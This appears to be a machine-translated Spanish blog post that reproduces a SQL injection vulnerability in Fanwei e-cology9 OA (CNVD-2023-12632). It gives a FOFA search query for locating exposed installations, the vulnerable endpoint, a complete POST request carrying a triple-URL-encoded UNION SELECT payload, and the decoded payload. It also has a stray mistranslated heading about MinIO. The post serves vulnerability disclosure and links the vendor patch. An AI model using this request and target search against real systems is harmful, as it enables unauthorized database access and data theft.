Fanwei OA e-cology9 tiene inyección SQL

Fanwei OA e-cology9 tiene inyección SQL

Descargo de responsabilidad: No utilice las tecnologías relevantes en este artículo para realizar pruebas ilegales. Cualquier consecuencia y pérdida directa o indirecta causada por la difusión y el uso de la información o las herramientas proporcionadas en este artículo correrán a cargo del propio usuario. Las consecuencias adversas tienen nada que ver con el autor del artículo. Este artículo es sólo para fines educativos.

1. Introducción a MinIO

Búsqueda de cuenta oficial de WeChat: Biblioteca de reaparición de vulnerabilidades de Nanfeng
Este artículo se publicó por primera vez en la cuenta oficial de la Biblioteca de reproducción de vulnerabilidades de Nanfeng

El sistema de oficina colaborativa Fanwei E-Cology9 es un sistema OA basado en JSP y base de datos SQL Server, que incluye gestión de documentos de conocimiento, gestión de recursos humanos, gestión de relaciones con clientes, gestión de proyectos, gestión financiera, gestión de flujo de trabajo, centro de datos, etc. y un entorno de gestión empresarial eficiente, que rompe las barreras entre diversos recursos de la empresa, como personal, finanzas, materiales, información, procesos, etc. y otros socios, se integran en una plataforma unificada, convirtiendo la empresa en una organización electrónica con colaboración interna y externa. .

2. Descripción de la vulnerabilidad

Existe una vulnerabilidad de inyección SQL en Fanwei ecology9, que los atacantes pueden aprovechar para obtener información confidencial de la base de datos.

ID CVE:
ID CNNVD:
ID CNVD: CNVD-2023-12632

3. Afecta la versión

Fanwei ecología V9 < 10,56

4. declaración de consulta fofa

app="Sistema empresarial colaborativo Panwei"

5. Recurrencia de la vulnerabilidad

Enlace de vulnerabilidad: http://127.0.0.1/mobile/plugin/browser.jsp
Paquete de datos de vulnerabilidad:

POST /mobile/plugin/browser.jsp HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Connection: Keep-Alive
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/x-www-form-urlencoded
Content-Length: 649

isDis=1&browserTypeId=269&keyword=%2525%2536%2531%2525%2532%2537%2525%2532%2530%2525%2537%2535%2525%2536%2565%2525%2536%2539%2525%2536%2566%2525%2536%2565%2525%2532%2530%2525%2537%2533%2525%2536%2535%2525%2536%2563%2525%2536%2535%2525%2536%2533%2525%2537%2534%2525%2532%2530%2525%2533%2531%2525%2532%2563%2525%2532%2537%2525%2532%2537%2525%2532%2562%2525%2532%2538%2525%2535%2533%2525%2534%2535%2525%2534%2563%2525%2534%2535%2525%2534%2533%2525%2535%2534%2525%2532%2530%2525%2534%2530%2525%2534%2530%2525%2535%2536%2525%2534%2535%2525%2535%2532%2525%2535%2533%2525%2534%2539%2525%2534%2566%2525%2534%2565%2525%2532%2539%2525%2532%2562%2525%2532%2537

El valor después del parámetro de palabra clave es

a' union select 1,''+(SELECT @@VERSION)+'

Obtenido después de tres codificaciones de URL
Fanwei OA e-cology9 tiene inyección SQL

Explosión de la versión de la base de datos a través de una vulnerabilidad de inyección
Fanwei OA e-cology9 tiene inyección SQL

6.POC&EXP

Siga la cuenta pública Nanfeng Vulnerability Reproduction Library y responda Vulnerability Reproduction 27 para obtener la dirección de descarga de la herramienta POC:
Fanwei OA e-cology9 tiene inyección SQL

7. Opiniones de rectificación

El fabricante ha actualizado el parche y el plan de reparación: https://www.weaver.com.cn/cs/securityDownload.asp#

8. Revisión pasada

Supongo que te gusta

Origin blog.csdn.net/nnn2188185/article/details/130444992
Recomendado
Clasificación